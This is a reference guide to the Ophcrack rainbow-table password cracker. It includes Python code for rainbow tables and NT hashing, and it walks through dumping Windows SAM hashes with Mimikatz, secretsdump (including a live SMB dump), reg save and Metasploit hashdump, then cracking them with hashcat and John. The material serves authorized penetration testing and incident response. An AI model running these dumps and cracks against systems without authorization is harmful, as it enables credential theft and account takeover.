Overview
Ophcrack is a Windows password cracker that uses rainbow tables to recover plaintext passwords from LM and NT (commonly called NTLM) hashes. It works from hashes dumped out of a system's SAM database in pwdump format, and the Ophcrack LiveCD boots the target from removable media, reads the SAM and SYSTEM hives directly and cracks the local account hashes without ever starting Windows.
Table lookups do the bulk of the work; a short brute-force pass (enabled by default) picks up passwords that fall just outside the tables. The tool is used in penetration testing, incident response and authorized password recovery. Its limits are the limits of rainbow tables: they work only because LM and NT hashes are unsalted, and they cover only the character sets and lengths they were built for.
Installation
Windows Installation
GUI Application
1. Download installer from ophcrack.sourceforge.io (the ophcrack.sourceforge.net address redirects there)
2. Run installer (ophcrack-3.8.0-installer.exe)
3. Follow installation wizard
4. Launch Ophcrack from Start Menu
Linux Installation
Debian/Ubuntu
sudo apt-get update
sudo apt-get install ophcrack ophcrack-data
RedHat/CentOS/Fedora
sudo yum install ophcrack
# or
sudo dnf install ophcrack
Build from Source
# Install dependencies (Ophcrack 3.8 builds against Qt 5; the GUI additionally needs Qwt; check the INSTALL file in the tarball for your release)
sudo apt-get install build-essential libssl-dev qtbase5-dev libqwt-qt5-dev
# Download source
wget https://sourceforge.net/projects/ophcrack/files/ophcrack/3.8.0/ophcrack-3.8.0.tar.bz2
tar -xjf ophcrack-3.8.0.tar.bz2
cd ophcrack-3.8.0
# Build (autotools, not cmake; add --disable-gui for a console-only binary on a headless cracking box)
./configure
make
sudo make install
Kali Linux
sudo apt-get install ophcrack ophcrack-data
Docker Installation
# Build Docker image (assumes a Dockerfile in the current directory that installs the ophcrack and ophcrack-data packages; the project ships none)
docker build -t ophcrack .
# Run with GUI (requires X11). Sharing the X socket hands the container full access to your display, so only do this with an image you built yourself.
# Mount the tables and the hash files as volumes so they stay outside the image.
docker run -it --rm -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix \
  -v /opt/ophcrack/tables:/tables:ro -v "$PWD/hashes:/work" ophcrack
Verify Installation
# Print the usage text. Ophcrack has no --version switch; -h is also the authoritative list of option letters for your build, which is worth checking because they differ from the long options other crackers use.
ophcrack -h
Basic Concepts
| Concept | Description |
|---|---|
| Rainbow Table | Precomputed chains of hash -> reduce -> hash over a fixed password space; only each chain's start and end point are stored, and a lookup regenerates the chain on demand. Works only for unsalted hashes such as LM and NT |
| NT Hash (often called NTLM hash) | MD4 of the UTF-16LE-encoded password; unsalted, case-sensitive, any length. Stored for every local account on every Windows version |
| LM Hash | DES-based legacy hash: password uppercased, padded to 14 bytes, split into two 7-byte halves that are hashed independently. Not stored by default since Vista; the value aad3b435b51404eeaad3b435b51404ee is the hash of an empty half and means no LM hash exists |
| Hash Chain | One sequence password -> hash -> reduction -> password ... of fixed length; a table is a set of such chains |
| Reduction Function | Maps a hash back into the password space. Rainbow tables use a different reduction per chain position, so two chains merge only if they collide in the same column |
| Brute-Force | Ophcrack's follow-up pass that tries short candidates and case variants the tables did not reach |
| Lookup | Recomputing the tail of a chain from the target hash for every possible column and matching the result against stored end points |
| Coverage | Fraction of the table's password space (charset x length) that a lookup actually recovers; below 100% because merged chains waste storage |
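The Hash Chain, Reduction Function, Lookup and Coverage rows above describe one algorithm, and it is short enough to run on a toy password space. The block below is an added example written for this page, not Ophcrack code: it builds a rainbow table over 3-letter lowercase passwords, using hashlib.md5 as a stand-in for the unsalted hash (the real tool hashes with MD4/DES, but the chain logic is identical), then looks hashes up exactly the way a rainbow lookup does. CHAIN_LEN, NUM_CHAINS, the start-point choice and the reduction formula are this example's own parameters; Ophcrack's tables use different sizes and a different reduction.

```python
import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 3
SPACE = len(CHARSET) ** PW_LEN   # 17576 candidate passwords in this toy space
CHAIN_LEN = 50                    # reductions per chain (columns)
NUM_CHAINS = 600                  # stored (start, end) pairs


def hash_pw(pw: str) -> bytes:
    # Stand-in for the unsalted target hash. No salt means the same password
    # always gives the same hash, which is the only reason precomputation works.
    return hashlib.md5(pw.encode()).digest()


def index_to_pw(n: int) -> str:
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def reduce_hash(h: bytes, column: int) -> str:
    # Position-dependent reduction R_i: mixing the column index in is what
    # makes this a rainbow table rather than a plain Hellman table; chains
    # merge only if they collide in the same column.
    n = (int.from_bytes(h[:8], "little") + column * 0x9E3779B1) % SPACE
    return index_to_pw(n)


def build_table():
    table = {}      # endpoint password -> list of start passwords
    seen = set()    # every password some chain passed through (for coverage)
    for k in range(NUM_CHAINS):
        start = index_to_pw((k * 7919) % SPACE)   # deterministic start points
        pw = start
        for i in range(CHAIN_LEN):
            seen.add(pw)
            pw = reduce_hash(hash_pw(pw), i)
        table.setdefault(pw, []).append(start)
    return table, seen


def coverage(seen) -> float:
    return len(seen) / SPACE


def lookup(table, target: bytes):
    # Assume the target sits in column j, finish the chain from there, and see
    # whether the resulting endpoint is stored. Later columns are cheaper, so
    # try them first.
    for j in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_hash(target, j)
        for i in range(j + 1, CHAIN_LEN):
            pw = reduce_hash(hash_pw(pw), i)
        for start in table.get(pw, ()):
            cand = start                     # regenerate the chain up to column j
            for i in range(j):
                cand = reduce_hash(hash_pw(cand), i)
            if hash_pw(cand) == target:
                return cand                  # otherwise a false alarm: keep going
    return None


if __name__ == "__main__":
    table, seen = build_table()
    print(f"stored {len(table)} endpoints, coverage {coverage(seen):.1%} of {SPACE}")
    print("lookup:", lookup(table, hash_pw("abc")))
```

Two things the numbers make concrete: the table stores 600 pairs but answers queries for thousands of passwords (that is the time/memory trade-off), and coverage never reaches 100% because chains merge and because the start points never touched every value, which is exactly why a hash that is "not found" says nothing about the password's strength, only about the table.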
Core Commands
| Command | Description |
|---|---|
| ophcrack -h | Show help message (the authoritative option list for your build) |
| ophcrack -f <file> | Load hashes from a pwdump-format file |
| ophcrack -w <dir> | Load hashes from a directory holding the SAM and SYSTEM hives |
| ophcrack -d <dir> | Base directory under which the rainbow table directories live |
| ophcrack -t <table>[,i,...] | Load a table directory (relative to -d), optionally only the listed table indexes |
| ophcrack -n <num> | Number of threads |
| ophcrack -g | Disable the GUI (console mode); without -g ophcrack starts the GUI |
| ophcrack -o <file> | Write cracked hashes to a file |
| ophcrack -x <file> | Export results as CSV |
| ophcrack -B / -b | Enable (default) / disable the brute-force pass |
| ophcrack -v | Verbose output |
| ophcrack -l <file> | Log all output to a file |
There is no "list tables" switch; what is installed is shown in the GUI's Tables dialog, and in console mode the start-up output names every table file it found.
GUI Mode Usage
Launch GUI
# Start GUI interface (the default whenever -g is absent; -g is "disable GUI", not "GUI mode")
ophcrack
# Start the GUI with tables and a hash file already loaded
ophcrack -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt
GUI Workflow
1. Load hashes (Load button)
- Single hash: paste one LM or NT hash
- PWDUMP file: a file in user:RID:LM:NT::: format (what every dumper below produces)
- Session file: resume a saved run
- Encrypted SAM: point at a directory holding the SAM and SYSTEM hives copied from the target
- Local SAM with samdump2: read the running machine's hives (Linux, needs root)
2. Select rainbow tables (Tables button)
- Install each table set by selecting its extracted directory
- Enable/disable table sets; XP sets apply to LM hashes, Vista sets to NT hashes, so a dump without LM hashes needs a Vista set
3. Start cracking
- Click "Crack"
- Watch the Progress and Statistics tabs; the preload phase reads the tables into memory before any lookup happens
- Cracked passwords appear in the LM Pwd 1, LM Pwd 2 and NT Pwd columns
4. Save results (Save button)
- Save to file or export to CSV
- Treat the output as credentials: store it encrypted and delete it when the engagement closes
Console Mode Usage
Load and Crack Hashes
# Basic cracking (console mode, tables under /opt/ophcrack/tables, Vista free set)
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt
# Use a specific number of threads and write cracked entries to a file
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -n 4 -o cracked.txt
# Verbose output
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -v
# Input format (pwdump): username:RID:LM_HASH:NT_HASH:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
User:1000:e52cac67419a6a9a42f8b3674a46f670:8846f7eaee8fb117ad06bdd830b7586c:::
# Reading the sample: aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty string, i.e. no LM hash is stored (the default since Vista), so only the NT column is crackable and the Vista tables are the right choice.
# 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string: Guest has a blank password.
# Administrator and User share an NT hash, so they share a password; with an unsalted hash that is visible before anything is cracked.
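To make the format concrete, here is an added example (written for this page, not part of Ophcrack) that computes NT hashes from scratch and triages a pwdump file the way the comments above do. MD4 is implemented inline because hashlib's md4 is disabled in many OpenSSL 3 builds; the sample dump is constructed from the three accounts shown above, and the function and field names are this example's own.

```python
import re
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        block = struct.unpack("<16I", bytes(msg[off:off + 64]))
        v = state[:]
        for fn, const, order, shifts in rounds:
            for i in range(16):
                t = (4 - i % 4) % 4          # operate on a, d, c, b in turn
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + fn(x, y, z) + block[order[i]] + const) & MASK32,
                             shifts[i % 4])
        state = [(s + w) & MASK32 for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    # NT hash = MD4(UTF-16LE(password)): no salt, no iteration, so one
    # precomputed (password, hash) pair applies to every account on every host.
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM of "": no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of "": blank password
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32})(?::.*)?$")


def parse_pwdump(text: str):
    """Parse pwdump lines and flag what a reviewer looks at before cracking."""
    entries, users_by_nt = [], {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = PWDUMP_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: not pwdump format: {line!r}")
        e = {"user": m["user"], "rid": int(m["rid"]),
             "lm": m["lm"].lower(), "nt": m["nt"].lower()}
        e["lm_stored"] = e["lm"] != EMPTY_LM   # LM present: crack it first, it is cheap
        e["blank"] = e["nt"] == EMPTY_NT
        users_by_nt.setdefault(e["nt"], []).append(e["user"])
        entries.append(e)
    for e in entries:
        # Unsalted hashes expose password reuse without cracking anything.
        e["shared_with"] = [u for u in users_by_nt[e["nt"]] if u != e["user"]]
    return entries


def uncracked_for_hashcat(entries, cracked_nt):
    """NT hashes still worth handing to hashcat -m 1000 (one hex hash per line)."""
    cracked = {h.lower() for h in cracked_nt}
    return sorted({e["nt"] for e in entries if not e["blank"] and e["nt"] not in cracked})


# Constructed sample dump: the same three accounts as the pwdump example above.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
User:1000:e52cac67419a6a9a42f8b3674a46f670:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for entry in parse_pwdump(SAMPLE_DUMP):
        print(entry)
    print("NT('password') =", nt_hash("password"))
```

Running it shows that nt_hash("password") is the Administrator/User hash from the sample, that Guest's NT hash is the hash of the empty string, and that only one distinct hash is actually worth sending to a GPU cracker once duplicates and blanks are removed. The regex also accepts lowercase hex and the trailing ":::" that real dumpers emit, which the stricter pattern further down this page does not.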
Dump Hashes from Windows
Using Mimikatz
# Run Mimikatz from an administrator prompt on the target
mimikatz.exe
# In mimikatz prompt
privilege::debug
token::elevate
lsadump::sam
# Output lists each local account with its RID and NTLM (NT) hash. Build pwdump lines from it as user:RID:aad3b435b51404eeaad3b435b51404ee:NT_HASH::: (lsadump::sam also prints an LM hash when one is stored).
Using Impacket secretsdump
# Parse exported SAM and SYSTEM hives offline; the output is already pwdump format
secretsdump.py -sam SAM -system SYSTEM LOCAL > hashes.txt
# Or from a live host over SMB with local administrator credentials (example target and credentials)
secretsdump.py 'WORKGROUP/Administrator:Passw0rd@10.0.0.5' > hashes.txt
# Either way, strip the banner lines before feeding the file to Ophcrack: keep only lines matching user:RID:LM:NT:::
grep -E '^[^:]+:[0-9]+:[0-9a-f]{32}:[0-9a-f]{32}:::' hashes.txt > ophcrack_input.txt
Using Registry Dump
# The hives are locked while Windows runs, so a plain copy fails. Export them with reg.exe from an administrator prompt, or take them from a Volume Shadow Copy or an offline disk image.
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
# On the analysis machine. SYSTEM is required: it holds the boot key that decrypts the SAM; the SAM alone yields nothing.
samdump2 SYSTEM SAM > hashes.txt
# Ophcrack understands only LM and NT hashes. Linux /etc/shadow entries (unshadow + john) are a different hash family: they are salted and cannot be converted into NT hashes, so they can never be fed to Ophcrack.
Rainbow Tables
Available Table Sets
| Table Set | Hash type | Notes | Size |
|---|---|---|---|
| XP free small | LM | Alphanumeric; free | ~380 MB |
| XP free fast | LM | Same coverage as XP free small, faster lookups; free | ~700 MB |
| XP special | LM | Alphanumeric plus special characters | ~7.5 GB |
| Vista free | NT | Free set for NT hashes | ~460 MB |
| Vista special | NT | Larger charset and length | ~8 GB |
The set names refer to the hash type, not the Windows version: "XP" sets crack LM hashes (stored by default up to XP/2003) and "Vista" sets crack NT hashes, which is what Vista, 7, 8, 10 and 11 store. There are no Windows-7-specific or "strongsalt" sets; NT hashes are not salted at all. Exact charsets, lengths, success rates and current sizes for each set, including the paid ones, are on the tables page linked below and should be taken from there rather than from this summary.
Download Rainbow Tables
# Official Ophcrack site (free tables)
# https://ophcrack.sourceforge.io/tables.php
# Command-line download
wget https://sourceforge.net/projects/ophcrack/files/tables/...
# Extract each set into its own directory under a common base (the free sets ship as zip files)
mkdir -p /opt/ophcrack/tables
unzip tables_vista_free.zip -d /opt/ophcrack/tables/tables_vista_free/
unzip tables_xp_free_fast.zip -d /opt/ophcrack/tables/tables_xp_free_fast/
# Point ophcrack at the base directory (-d) and name the table directories to load (-t). There is no config file with a [rainbow_tables] section to edit; the GUI keeps its own list of installed tables in its settings.
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -t tables_xp_free_fast -f hashes.txt
# Verify the tables load: the start-up output lists every table file found and whether it could be opened
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -v
Crack Operations
Single Hash Cracking
# Crack single NT hash (LM column set to the empty-LM value, trailing ::: as in pwdump)
echo "username:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::" > single.txt
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f single.txt
Batch Cracking
# Crack every hash in a pwdump file and write the cracked entries to a file
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -o results.txt
# Export a CSV for reporting
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -x results.csv
Advanced Cracking Parameters
# Multi-threaded cracking
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -n 8
# Tables only: skip the brute-force pass (faster; misses short passwords just outside the tables)
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -b
# Load only selected table files from a set (indexes after the directory name)
ophcrack -g -d /opt/ophcrack/tables -t tables_xp_free_fast,0,1 -f hashes.txt
# Tables on a different volume
ophcrack -g -d /mnt/rainbow_tables -t tables_vista_free -f hashes.txt
# Ophcrack has no --batch, --fast or --thorough options; the speed/completeness trade-off is which table sets you load.
Real-World Scenarios
Post-Compromise Password Recovery
# 1. Extract hashes from the compromised system (secretsdump, mimikatz lsadump::sam, or samdump2 on exported hives); say the raw dump is sam_dump.txt
# 2. Normalize to pwdump format user:RID:LM:NT::: (lowercase hex, empty-LM placeholder when the dump has no LM column, banner and malformed lines dropped)
python3 -c "
import sys
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
for line in sys.stdin:
    parts = line.strip().split(':')
    if len(parts) < 4 or not parts[1].isdigit():
        continue  # banner, blank or malformed line
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if len(lm) != 32:
        lm = EMPTY_LM  # dump carried no LM hash
    print(f'{user}:{rid}:{lm}:{nt}:::')
" < sam_dump.txt > ophcrack_input.txt
# 3. Crack with Ophcrack
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f ophcrack_input.txt -o cracked.txt
# 4. Review cracked.txt; whatever is still uncracked goes to hashcat or John (below)
Incident Response Investigation
# Collect hashes from a forensic image: export the SAM and SYSTEM hives (FTK Imager, or mount the image read-only) and parse them offline
secretsdump.py -sam /mnt/evidence/Windows/System32/config/SAM -system /mnt/evidence/Windows/System32/config/SYSTEM LOCAL > forensic_hashes.txt
# Process with Ophcrack
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f forensic_hashes.txt -o report.txt
# Triage before cracking: blank passwords and accounts sharing a hash are findings on their own and need no cracking at all (NT hash is field 4)
awk -F: '$4=="31d6cfe0d16ae931b73c59d7e0c089c0"{print "blank password:", $1}' forensic_hashes.txt
cut -d: -f4 forensic_hashes.txt | sort | uniq -d
System Access Recovery
# Authorized password recovery scenario
# 1. Boot with Ophcrack Live USB
# 2. Automatic SAM detection
# 3. Password cracking begins
# 4. Passwords displayed after cracking
Hashcat Post-Processing
# Extract NT hashes for hashcat: -m 1000 takes one hex hash per line (Ophcrack has no --hash-only switch; field 4 of a pwdump line is the NT hash)
cut -d: -f4 hashes.txt | sort -u > hashes.hashcat
# Run hashcat on what the tables missed. A full 8-character ?a mask is 95^8 candidates, which takes hours even on a good GPU; run a wordlist plus rules first.
hashcat -m 1000 -a 0 hashes.hashcat rockyou.txt -r rules/best64.rule
hashcat -m 1000 -a 3 hashes.hashcat ?a?a?a?a?a?a?a?a
John the Ripper Comparison
# Extract NT hashes (pwdump format)
secretsdump.py -sam SAM -system SYSTEM LOCAL > hashes.txt
# Try Ophcrack first (fast with rainbow tables)
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -o cracked.txt
# Then John for the rest (John reads pwdump lines directly with --format=NT; --format=LM for the LM column)
john --format=NT --wordlist=rockyou.txt hashes.txt
john --format=NT --show hashes.txt
# Metasploit: dump the SAM from an existing meterpreter session; this is a post module, not an exploit or persistence module
msfconsole
use post/windows/gather/hashdump
set SESSION 1
run
# (equivalently, at the meterpreter prompt: hashdump)
# The output is pwdump format: save it as dumped_hashes.txt and crack with Ophcrack
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f dumped_hashes.txt
Optimization Techniques
Use GPU Acceleration
# Ophcrack is CPU-only: there is no CUDA or OpenCL build option and no --gpu switch. A rainbow-table lookup is bound by random reads of the table files, not by hashing, so the useful knobs are thread count (-n) and fast storage for the tables.
# GPU acceleration belongs to the hashing-heavy step that follows: hand the hashes the tables missed to hashcat (-m 1000), which computes NT hashes on the GPU
cut -d: -f4 hashes.txt | sort -u > remaining.txt
hashcat -m 1000 -a 0 remaining.txt rockyou.txt -r rules/best64.rule
Rainbow Table Selection
# Choose tables by hash type, not by the Windows version on the box
# LM hashes present (XP/2003 era, or LM storage re-enabled by policy): XP tables
ophcrack -g -d /opt/ophcrack/tables -t tables_xp_free_fast -f hashes.txt
# NT hashes only (Vista and later, including 7/8/10/11): Vista tables
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt
# Mixed dump or unknown: load both; each table set is applied to the hash type it was built for
ophcrack -g -d /opt/ophcrack/tables -t tables_xp_free_fast -t tables_vista_free -f hashes.txt
Parallel Cracking
# Use multiple threads (one per core; more than the core count only adds contention)
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -n 16
# Distribute across machines: split the pwdump file, give each machine one part and its own copy of the tables, then concatenate the -o outputs
split -l 500 hashes.txt part_
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f part_aa -o part_aa.cracked
cat part_*.cracked > results.txt
Resource Management
# Memory: tables are preloaded into RAM before cracking, so if the box swaps, load fewer table sets per run (-t) instead of everything under -d. There is no --max-memory option.
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt
# CPU thread allocation
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -n 4
# Monitor performance: there is no --monitor option; use verbose output and time the run
time ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -n 8 -v
Hash File Optimization
# Remove duplicate lines
sort -u hashes.txt > hashes_unique.txt
# Remove accounts whose NT hash was already cracked in an earlier run. The NT hash is field 4 of a pwdump line; a -o file keeps the pwdump columns in front of the recovered password, so field 4 works there too (check its first line).
cut -d: -f4 cracked.txt | tr 'A-F' 'a-f' | sort -u > cracked_hashes.txt
awk -F: 'NR==FNR{done[$1]; next} !(tolower($4) in done)' cracked_hashes.txt hashes_unique.txt > remaining.txt
Result Analysis
Output Interpretation
Ophcrack reports one row per account with the columns User, LM Hash, NT Hash, LM Pwd 1, LM Pwd 2 and NT Pwd. There are no [CRACKED] / [NOT FOUND] markers; read the password columns instead:
- LM Pwd 1 / LM Pwd 2 are the two 7-character halves of the LM password, uppercase, each cracked independently (the second half is empty for passwords of 7 characters or fewer). Two independent 7-character problems is why LM falls so quickly.
- NT Pwd is the case-sensitive password recovered from the NT hash. When only the LM halves were cracked, the brute-force pass tries case variants of the LM result against the NT hash to recover the real casing.
- empty in a password column means the hash is the empty-string hash: a blank password for NT, or "no LM hash stored" for LM.
- A password column that is still blank after the run finishes means the hash was not in the loaded tables and was not reached by brute force. That is not evidence of a strong password, only of one outside the table's charset or length.
- Disabled accounts are not flagged; the SAM dump does not carry that state, so check account status separately before reporting.
Export Results
# Save results to file (-o cracked entries, -x CSV for reporting)
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -o results.txt -x results.csv
# Parse results: user and NT hash of cracked accounts (fields 1 and 4 of the pwdump layout the -o file keeps)
cut -d: -f1,4 results.txt
# Count success rate: cracked accounts versus accounts in the input
cracked=$(grep -c . results.txt)
total=$(grep -c . hashes.txt)
echo "Success: $cracked/$total"
Security Considerations
- Use only on systems you own or have authorization to test
- Secure cracked passwords and results
- Consider privacy implications of password recovery
- Maintain audit trails of cracking operations
- Dispose of password lists securely
- Follow organizational security policies
- Respect legal and regulatory requirements
Limitations and Workarounds
Hashes Not Cracked
# Possible causes:
# 1. Password outside the table's character set (special characters against the free tables)
# 2. Password longer than the table supports
# 3. Wrong table type for the hash: XP tables crack only LM hashes, Vista tables only NT hashes
# 4. The hash is not LM/NT at all (domain cached credentials, Kerberos keys, Linux shadow entries)
# Workarounds:
# - Load the larger/special table sets
# - Keep Ophcrack's brute-force pass on (-B, the default); it covers only short passwords
# - hashcat -m 1000 on a GPU for wordlist, rules and mask attacks
# - Dictionary + rules with John (--format=NT)
Table Coverage
# Check table coverage on the tables page before choosing a set; the free sets target 8 characters or fewer within their charset
# Longer passwords are less likely to crack, and anything outside the charset never will
# Special characters: use the special table sets
# What to expect from each hash type
# LM: case-insensitive, two independent 7-character halves, padded to 14; any LM hash whose halves lie within the charset is effectively always recoverable
# NT: case-sensitive Unicode of any length; tables cover a bounded charset and length, so long or unusual passwords stay uncracked
# If cracking is slow:
# 1. Allocate more CPU threads (-n, up to the core count)
# 2. Put the tables on an SSD: lookups are dominated by random reads of the table files (there is no GPU mode)
# 3. Load only the table sets that match the hash types present
# 4. Reduce the number of hashes per run
Troubleshooting
Rainbow Tables Not Found
# Verify table locations: each set must sit in its own directory under the base directory
ls -la /opt/ophcrack/tables/
ls /opt/ophcrack/tables/tables_vista_free/
# Pass the base directory and the table directory explicitly; verbose output names every table file it tries to open
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt -v
# Table sets installed through the GUI are remembered in its settings, not in a hand-edited ~/.ophcrack/ophcrack.conf; reinstall them from the Tables dialog if the directory moved
GUI Not Starting
# A from-source build without Qt has no GUI at all; install the distribution package (which pulls the Qt libraries) or rebuild with ./configure --disable-gui and use console mode
sudo apt-get install ophcrack
# Run in console mode (-g disables the GUI)
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -f hashes.txt
# Check for display server
echo $DISPLAY
Hash Format Errors
# Correct hash format (pwdump)
username:RID:LM_HASH:NT_HASH:::
# Validate format (hex in either case, optional trailing fields)
grep -Ev "^[^:]+:[0-9]+:[a-fA-F0-9]{32}:[a-fA-F0-9]{32}(:.*)?$" hashes.txt
# Convert from other tools: secretsdump and samdump2 already emit pwdump lines; mimikatz lsadump::sam output must be reassembled by hand into user:RID:aad3b435b51404eeaad3b435b51404ee:NT_HASH:::
Advanced Usage
Custom Rainbow Tables
# RainbowCrack's rtgen builds .rt tables for rcrack. Ophcrack cannot load them and ships no generator for its own table format, so "custom tables" means a separate RainbowCrack workflow.
rtgen <hash_algorithm> <charset> <plaintext_len_min> <plaintext_len_max> <table_index> <chain_len> <chain_num> <part_index>
# Example: NT-hash tables over lowercase letters and digits, 1 to 7 characters
rtgen ntlm loweralpha-numeric 1 7 0 3800 33554432 0
rtsort .
rcrack . -h 8846f7eaee8fb117ad06bdd830b7586c
Scripted Cracking
#!/bin/bash
# Automated hash cracking workflow. Assumes the SAM and SYSTEM hives were exported on the target (reg save) and that the tables live under /opt/ophcrack/tables.
set -euo pipefail
# 1. Fetch both hives: SAM alone is useless without the boot key held in SYSTEM
source_system="target.example.com"
scp "admin@$source_system:/backup/SAM" "admin@$source_system:/backup/SYSTEM" .
# 2. Convert to pwdump format
samdump2 SYSTEM SAM > hashes.txt
# 3. Crack with Ophcrack (console mode, cracked entries to results.txt)
ophcrack -g -d /opt/ophcrack/tables -t tables_vista_free -t tables_xp_free_fast -f hashes.txt -o results.txt
# 4. Parse and report
{
  echo "=== Password Crack Results ==="
  echo "Total Hashes: $(grep -c . hashes.txt)"
  echo "Cracked: $(grep -c . results.txt)"
  echo "Blank passwords: $(awk -F: '$4=="31d6cfe0d16ae931b73c59d7e0c089c0"' hashes.txt | wc -l)"
  echo
  cat results.txt
} > report.txt
# Hives, dumps and results are credentials: keep them off shared storage
chmod 600 SAM SYSTEM hashes.txt results.txt report.txt
Related Tools
- Hashcat - GPU-accelerated password cracker (-m 1000 for NT hashes)
- John the Ripper - CPU-based password cracker (--format=NT, --format=LM)
- Mimikatz - Credential extraction tool (lsadump::sam)
- Impacket secretsdump.py - dumps SAM/SYSTEM hives, offline or remotely, straight into pwdump format
- samdump2 - extracts pwdump lines from exported SAM and SYSTEM hives
- RainbowCrack - rainbow table generator (its .rt tables cannot be loaded by Ophcrack)
- Cain & Abel - Windows password recovery (unmaintained)